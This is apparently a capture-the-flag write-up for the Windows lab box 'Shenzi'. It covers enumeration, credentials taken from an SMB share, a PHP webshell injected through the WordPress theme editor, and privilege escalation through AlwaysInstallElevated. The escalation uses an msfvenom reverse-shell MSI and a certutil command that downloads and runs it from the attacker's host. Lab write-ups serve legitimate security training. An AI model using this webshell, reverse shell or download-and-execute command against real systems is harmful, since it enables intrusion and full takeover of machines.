Shenzi
Source: Proving Grounds OS: Windows Community Rating: Hard
Enumeration & Reconnaissance
Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669
Service Analysis
FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.
When I tried to access phpMyAdmin, I received the message:
"New XAMPP security concept: Access to the requested directory is only available from the local network."
I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I started checking SMB. I just checked the files from autorecon, enum4linux showed nothing, but then smbclient revealed a share named Shenzi.
I connected to the share using:
smbclient \192.168.213.55\Shenzi
Inside, I found a passwords.txt file:
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight357Most passwords were defaults, except for WordPress, which wasn’t the default. That should have hinted at something.
However, I couldn’t find any WordPress site. Even the fuzzers didn't expose any. I tried the credentials on FTP with no luck, and kept going in circles. I started looking for hints and that's where the name of the box/user came in handy, the WordPress site is deployed behind the username,
http://192.168.213.55/shenzi/
That's what I hate about CTFs in general, the type of guessing enumeration.
Gaining Initial Access
Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:
if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }
When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.
Privilege Escalation
Once inside, I ran the basic
whoami /privand then uploaded WinPeas. WinPeas exposed that:
AlwaysInstallElevated is set to 1 in HKLM
AlwaysInstallElevated is set to 1 in HKCU
This means any MSI package we install will run with elevated privileges. I then created an MSI shell using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=8811 -f msi -o shell.msiI then uploaded and executed it:
certutil -urlcache -split -f http://192.168.45.170:901/shell.msi
.\shell.msi
Lessons Learned
Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to gain initial access.
The AlwaysInstallElevated setting in both HKLM and HKCU is a reliable privilege escalation vector on Windows.
Last updated